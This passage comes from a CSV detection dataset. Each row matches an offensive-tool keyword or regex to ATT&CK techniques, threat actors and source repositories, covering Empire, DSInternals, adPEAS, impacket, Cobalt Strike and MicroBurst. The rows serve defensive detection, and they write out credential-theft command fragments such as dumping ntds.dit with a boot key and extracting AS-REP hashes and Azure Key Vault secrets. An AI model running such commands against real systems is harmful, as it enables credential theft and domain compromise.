- TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Start-MonitorTCPConnections.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45830"
"*Get-ADComputer * -Properties PrincipalsAllowedToDelegateToAccount*",".{0,1000}Get\-ADComputer\s.{0,1000}\s\-Properties\sPrincipalsAllowedToDelegateToAccount.{0,1000}","offensive_tool_keyword","powershell","Command to get the list of accounts with PrincipalsAllowedToDelegateToAccount (used to exploit Bronze Bit Attack)","T1003 - T1057 - T1087 - T1482 - T1136","TA0001 - TA0002 - TA0005 - TA0006 - TA0008","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","45831"
"*Get-ADComputer RODC -Properties msDS-RevealedList*",".{0,1000}Get\-ADComputer\sRODC\s\-Properties\smsDS\-RevealedList.{0,1000}","offensive_tool_keyword","SharpRODC","audit the security of read-only domain controllers","T1012 - T1482 - T1207 - T1208 - T1209 - T1212","TA0007 - TA0008 - TA0006","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpRODC","1","0","N/A","N/A","8","2","115","8","2023-11-27T12:41:52Z","2023-11-24T14:35:49Z","45834"
"*Get-ADCSTemplateACL*",".{0,1000}Get\-ADCSTemplateACL.{0,1000}","offensive_tool_keyword","PoshADCS","attack vectors against Active Directory by abusing Active Directory Certificate Services (ADCS)","T1213.003 - T1213 - T1098.003 - T1098 - T1484.001","TA0002 - TA0003 - TA0040","N/A","N/A","Persistence","https://github.com/cfalta/PoshADCS","1","0","N/A","N/A","7","2","186","17","2021-07-07T16:47:07Z","2019-10-15T15:54:03Z","45835"
"*Get-ADCSVulns*",".{0,1000}Get\-ADCSVulns.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","1","N/A","N/A","5","4","389","106","2025-04-08T06:17:54Z","2018-04-20T11:29:06Z","45836"
"*Get-ADDBAccount * -DataBasePath *ntds.dit*",".{0,1000}Get\-ADDBAccount\s.{0,1000}\s\-DataBasePath\s.{0,1000}ntds\.dit.{0,1000}","offensive_tool_keyword","DSInternals","Directory Services Internals (DSInternals) PowerShell Module and Framework - abused by attackers","T1003 - T1087 - T1018 - T1110 - T1558","TA0003 - TA0006 - TA0007","N/A","COZY BEAR","Discovery","https://github.com/MichaelGrafnetter/DSInternals","1","0","N/A","AD Enumeration","10","10","1760","265","2025-04-16T18:12:55Z","2015-12-25T13:23:05Z","45837"
"*Get-ADDBAccount * -DBPath *ntds.dit*",".{0,1000}Get\-ADDBAccount\s.{0,1000}\s\-DBPath\s.{0,1000}ntds\.dit.{0,1000}","offensive_tool_keyword","DSInternals","Directory Services Internals (DSInternals) PowerShell Module and Framework - abused by attackers","T1003 - T1087 - T1018 - T1110 - T1558","TA0003 - TA0006 - TA0007","N/A","COZY BEAR","Discovery","https://github.com/MichaelGrafnetter/DSInternals","1","0","N/A","AD Enumeration","10","10","1760","265","2025-04-16T18:12:55Z","2015-12-25T13:23:05Z","45838"
"*Get-ADDBAccount -All -DBPath *.ntds.dit* -BootKey*",".{0,1000}Get\-ADDBAccount\s\-All\s\-DBPath\s.{0,1000}\.ntds\.dit.{0,1000}\s\-BootKey.{0,1000}","offensive_tool_keyword","DSInternals","Directory Services Internals (DSInternals) PowerShell Module and Framework - abused by attackers","T1003 - T1087 - T1018 - T1110 - T1558","TA0003 - TA0006 - TA0007","N/A","COZY BEAR","Discovery","https://github.com/MichaelGrafnetter/DSInternals","1","0","N/A","AD Enumeration","10","10","1760","265","2025-04-16T18:12:55Z","2015-12-25T13:23:05Z","45839"
"*Get-ADDBAccount* -BootKey* -DataBasePath *.ntds.dit",".{0,1000}Get\-ADDBAccount.{0,1000}\s\-BootKey.{0,1000}\s\-DataBasePath\s.{0,1000}\.ntds\.dit","offensive_tool_keyword","DSInternals","Directory Services Internals (DSInternals) PowerShell Module and Framework - abused by attackers","T1003 - T1087 - T1018 - T1110 - T1558","TA0003 - TA0006 - TA0007","N/A","COZY BEAR","Discovery","https://github.com/MichaelGrafnetter/DSInternals","1","0","N/A","AD Enumeration","10","10","1760","265","2025-04-16T18:12:55Z","2015-12-25T13:23:05Z","45840"
"*Get-ADDBAccount* -BootKey* -DBPath *.ntds.dit",".{0,1000}Get\-ADDBAccount.{0,1000}\s\-BootKey.{0,1000}\s\-DBPath\s.{0,1000}\.ntds\.dit","offensive_tool_keyword","DSInternals","Directory Services Internals (DSInternals) PowerShell Module and Framework - abused by attackers","T1003 - T1087 - T1018 - T1110 - T1558","TA0003 - TA0006 - TA0007","N/A","COZY BEAR","Discovery","https://github.com/MichaelGrafnetter/DSInternals","1","0","N/A","AD Enumeration","10","10","1760","265","2025-04-16T18:12:55Z","2015-12-25T13:23:05Z","45841"
"*Get-ADDBAccount* -DataBasePath *.ntds.dit* -BootKey*",".{0,1000}Get\-ADDBAccount.{0,1000}\s\-DataBasePath\s.{0,1000}\.ntds\.dit.{0,1000}\s\-BootKey.{0,1000}","offensive_tool_keyword","DSInternals","Directory Services Internals (DSInternals) PowerShell Module and Framework - abused by attackers","T1003 - T1087 - T1018 - T1110 - T1558","TA0003 - TA0006 - TA0007","N/A","COZY BEAR","Discovery","https://github.com/MichaelGrafnetter/DSInternals","1","0","N/A","AD Enumeration","10","10","1760","265","2025-04-16T18:12:55Z","2015-12-25T13:23:05Z","45842"
"*Get-adPEASAccounts*",".{0,1000}Get\-adPEASAccounts.{0,1000}","offensive_tool_keyword","adPEAS","adPEAS is a Powershell tool to automate Active Directory enumeration -  wrapper for PowerView - PoshADCS - BloodHound and others","T1016 - T1087.002 - T1482 - T1207 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/61106960/adPEAS","1","1","N/A","N/A","8","10","1095","132","2025-04-01T16:16:15Z","2020-12-23T08:10:19Z","45848"
"*Get-adPEASADCS*",".{0,1000}Get\-adPEASADCS.{0,1000}","offensive_tool_keyword","adPEAS","adPEAS is a Powershell tool to automate Active Directory enumeration -  wrapper for PowerView - PoshADCS - BloodHound and others","T1016 - T1087.002 - T1482 - T1207 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/61106960/adPEAS","1","1","N/A","N/A","8","10","1095","132","2025-04-01T16:16:15Z","2020-12-23T08:10:19Z","45849"
"*Get-adPEASBloodhound*",".{0,1000}Get\-adPEASBloodhound.{0,1000}","offensive_tool_keyword","adPEAS","adPEAS is a Powershell tool to automate Active Directory enumeration -  wrapper for PowerView - PoshADCS - BloodHound and others","T1016 - T1087.002 - T1482 - T1207 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/61106960/adPEAS","1","1","N/A","N/A","8","10","1095","132","2025-04-01T16:16:15Z","2020-12-23T08:10:19Z","45850"
"*Get-adPEASComputer*",".{0,1000}Get\-adPEASComputer.{0,1000}","offensive_tool_keyword","adPEAS","adPEAS is a Powershell tool to automate Active Directory enumeration -  wrapper for PowerView - PoshADCS - BloodHound and others","T1016 - T1087.002 - T1482 - T1207 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/61106960/adPEAS","1","1","N/A","N/A","8","10","1095","132","2025-04-01T16:16:15Z","2020-12-23T08:10:19Z","45851"
"*Get-adPEASCreds*",".{0,1000}Get\-adPEASCreds.{0,1000}","offensive_tool_keyword","adPEAS","adPEAS is a Powershell tool to automate Active Directory enumeration -  wrapper for PowerView - PoshADCS - BloodHound and others","T1016 - T1087.002 - T1482 - T1207 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/61106960/adPEAS","1","1","N/A","N/A","8","10","1095","132","2025-04-01T16:16:15Z","2020-12-23T08:10:19Z","45852"
"*Get-adPEASDelegation*",".{0,1000}Get\-adPEASDelegation.{0,1000}","offensive_tool_keyword","adPEAS","adPEAS is a Powershell tool to automate Active Directory enumeration -  wrapper for PowerView - PoshADCS - BloodHound and others","T1016 - T1087.002 - T1482 - T1207 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/61106960/adPEAS","1","1","N/A","N/A","8","10","1095","132","2025-04-01T16:16:15Z","2020-12-23T08:10:19Z","45853"
"*Get-adPEASDomain*",".{0,1000}Get\-adPEASDomain.{0,1000}","offensive_tool_keyword","adPEAS","adPEAS is a Powershell tool to automate Active Directory enumeration -  wrapper for PowerView - PoshADCS - BloodHound and others","T1016 - T1087.002 - T1482 - T1207 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/61106960/adPEAS","1","1","N/A","N/A","8","10","1095","132","2025-04-01T16:16:15Z","2020-12-23T08:10:19Z","45854"
"*Get-adPEASGPO*",".{0,1000}Get\-adPEASGPO.{0,1000}","offensive_tool_keyword","adPEAS","adPEAS is a Powershell tool to automate Active Directory enumeration -  wrapper for PowerView - PoshADCS - BloodHound and others","T1016 - T1087.002 - T1482 - T1207 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/61106960/adPEAS","1","1","N/A","N/A","8","10","1095","132","2025-04-01T16:16:15Z","2020-12-23T08:10:19Z","45855"
"*Get-adPEASRights*",".{0,1000}Get\-adPEASRights.{0,1000}","offensive_tool_keyword","adPEAS","adPEAS is a Powershell tool to automate Active Directory enumeration -  wrapper for PowerView - PoshADCS - BloodHound and others","T1016 - T1087.002 - T1482 - T1207 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/61106960/adPEAS","1","1","N/A","N/A","8","10","1095","132","2025-04-01T16:16:15Z","2020-12-23T08:10:19Z","45856"
"*Get-ADReplAccount -All *",".{0,1000}Get\-ADReplAccount\s\-All\s.{0,1000}","offensive_tool_keyword","DSInternals","Directory Services Internals (DSInternals) PowerShell Module and Framework - abused by attackers","T1003 - T1087 - T1018 - T1110 - T1558","TA0003 - TA0006 - TA0007","N/A","COZY BEAR","Discovery","https://github.com/MichaelGrafnetter/DSInternals","1","0","N/A","AD Enumeration","10","10","1760","265","2025-04-16T18:12:55Z","2015-12-25T13:23:05Z","45857"
"*Get-ADUsernameFromEWS*",".{0,1000}Get\-ADUsernameFromEWS.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1087.003 - T1110.003 - T1114.002","TA0006 -TA0009 -TA0007","N/A","Leafminer","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","N/A","10","3046","580","2024-08-07T18:11:58Z","2016-09-08T00:36:51Z","45862"
"*GetADUsers.py*",".{0,1000}GetADUsers\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","45863"
"*Get-ADUsersWithoutPreAuth*",".{0,1000}Get\-ADUsersWithoutPreAuth.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","1","N/A","N/A","5","4","389","106","2025-04-08T06:17:54Z","2018-04-20T11:29:06Z","45864"
"*Get-AesKeyFromPassphrase*",".{0,1000}Get\-AesKeyFromPassphrase.{0,1000}","offensive_tool_keyword","TGT_Monitor","This script continuously monitors cache for new TGTs and displays them on the screen (admin privs required)","T1557.001 - T1040","TA0006 - TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/TGT_Monitor","1","0","N/A","N/A","9","1","3","0","2023-11-08T18:48:55Z","2023-11-07T22:53:45Z","45866"
"*getAggressorClient*",".{0,1000}getAggressorClient.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","45867"
"*getAllUserSpns*",".{0,1000}getAllUserSpns.{0,1000}","offensive_tool_keyword","ldapdomaindump","Active Directory information dumper via LDAP","T1087 - T1005 - T1016","TA0007","N/A","EMBER BEAR","Discovery","https://github.com/dirkjanm/ldapdomaindump","1","1","N/A","N/A","10","10","1242","201","2025-04-06T13:31:57Z","2016-05-24T18:46:56Z","45868"
"*Get-and-Brute-LocalAccount.ps1*",".{0,1000}Get\-and\-Brute\-LocalAccount\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","45869"
"*Get-AndDisplayInformation -ClassName ""Win32_BIOS""*",".{0,1000}Get\-AndDisplayInformation\s\-ClassName\s\""Win32_BIOS\"".{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","45870"
"*Get-AndDisplayInformation -ClassName ""Win32_ComputerSystem"" -PropertyFilter UserName*",".{0,1000}Get\-AndDisplayInformation\s\-ClassName\s\""Win32_ComputerSystem\""\s\-PropertyFilter\sUserName.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","45871"
"*Get-AndDisplayInformation -ClassName ""Win32_ComputerSystem""*",".{0,1000}Get\-AndDisplayInformation\s\-ClassName\s\""Win32_ComputerSystem\"".{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","45872"
"*Get-AndDisplayInformation -ClassName ""Win32_Desktop""*",".{0,1000}Get\-AndDisplayInformation\s\-ClassName\s\""Win32_Desktop\"".{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","45873"
"*Get-AndDisplayInformation -ClassName ""Win32_LocalTime""*",".{0,1000}Get\-AndDisplayInformation\s\-ClassName\s\""Win32_LocalTime\"".{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","45874"
"*Get-AndDisplayInformation -ClassName ""Win32_LogicalDisk"" -PropertyFilter DeviceID,DriveType,ProviderName,VolumeName,Size,FreeSpace,PSComputerName*",".{0,1000}Get\-AndDisplayInformation\s\-ClassName\s\""Win32_LogicalDisk\""\s\-PropertyFilter\sDeviceID,DriveType,ProviderName,VolumeName,Size,FreeSpace,PSComputerName.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","45875"
"*Get-AndDisplayInformation -ClassName ""Win32_LogonSession""*",".{0,1000}Get\-AndDisplayInformation\s\-ClassName\s\""Win32_LogonSession\"".{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","45876"
"*Get-AndDisplayInformation -ClassName ""Win32_OperatingSystem"" -PropertyFilter Build*,OSType,ServicePack**",".{0,1000}Get\-AndDisplayInformation\s\-ClassName\s\""Win32_OperatingSystem\""\s\-PropertyFilter\sBuild.{0,1000},OSType,ServicePack.{0,1000}.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","45877"
"*Get-AndDisplayInformation -ClassName ""Win32_OperatingSystem"" -PropertyFilter user*",".{0,1000}Get\-AndDisplayInformation\s\-ClassName\s\""Win32_OperatingSystem\""\s\-PropertyFilter\suser.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","45878"
"*Get-AndDisplayInformation -ClassName ""Win32_Processor"" -PropertyFilter **",".{0,1000}Get\-AndDisplayInformation\s\-ClassName\s\""Win32_Processor\""\s\-PropertyFilter\s.{0,1000}.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","45879"
"*Get-AndDisplayInformation -ClassName ""Win32_QuickFixEngineering"" -PropertyFilter HotFixId*",".{0,1000}Get\-AndDisplayInformation\s\-ClassName\s\""Win32_QuickFixEngineering\""\s\-PropertyFilter\sHotFixId.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","45880"
"*Get-AndDisplayInformation -ClassName ""Win32_Service"" -PropertyFilter Status,Name,DisplayName*",".{0,1000}Get\-AndDisplayInformation\s\-ClassName\s\""Win32_Service\""\s\-PropertyFilter\sStatus,Name,DisplayName.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","45881"
"*Get-AppLockerConfig.ps1*",".{0,1000}Get\-AppLockerConfig\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","45882"
"*Get-ASREPHash*",".{0,1000}Get\-ASREPHash.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","AS-REP roasting Get the hash for a roastable user using ASREPRoast.ps1","T1110","TA0006","N/A","Black Basta","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","45884"
"*Get-Attack -term *",".{0,1000}Get\-Attack\s\-term\s.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","N/A","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","45885"
"*Get-AzAutomationAccountCredsREST.ps1*",".{0,1000}Get\-AzAutomationAccountCredsREST\.ps1.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","Scattered Spider*","Exploitation tool","https://github.com/NetSPI/MicroBurst","1","1","N/A","N/A","6","10","2143","320","2025-03-19T17:07:24Z","2018-07-16T16:47:20Z","45886"
"*Get-AzDomainInfo*",".{0,1000}Get\-AzDomainInfo.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","Scattered Spider*","Exploitation tool","https://github.com/NetSPI/MicroBurst","1","1","N/A","N/A","6","10","2143","320","2025-03-19T17:07:24Z","2018-07-16T16:47:20Z","45887"
"*Get-AzDomainInfoREST.ps1*",".{0,1000}Get\-AzDomainInfoREST\.ps1.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","Scattered Spider*","Exploitation tool","https://github.com/NetSPI/MicroBurst","1","1","N/A","N/A","6","10","2143","320","2025-03-19T17:07:24Z","2018-07-16T16:47:20Z","45888"
"*Get-AzKeyVaultKeysREST.ps1*",".{0,1000}Get\-AzKeyVaultKeysREST\.ps1.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","Scattered Spider*","Exploitation tool","https://github.com/NetSPI/MicroBurst","1","1","N/A","N/A","6","10","2143","320","2025-03-19T17:07:24Z","2018-07-16T16:47:20Z","45889"
"*Get-AzKeyVaultSecretsREST.ps1*",".{0,1000}Get\-AzKeyVaultSecretsREST\.ps1.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","Scattered Spider*","Exploitation tool","https://github.com/NetSPI/MicroBurst","1","1","N/A","N/A","6","10","2143","320","2025-03-19T17:07:24Z","2018-07-16T16:47:20Z","45890"
"*Get-AzPasswords*",".{0,1000}Get\-AzPasswords.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","Scattered Spider*","Exploitation tool","https://github.com/NetSPI/MicroBurst","1","1","N/A","N/A","6","10","2143","320","2025-03-19T17:07:24Z","2018-07-16T16:47:20Z","45891"
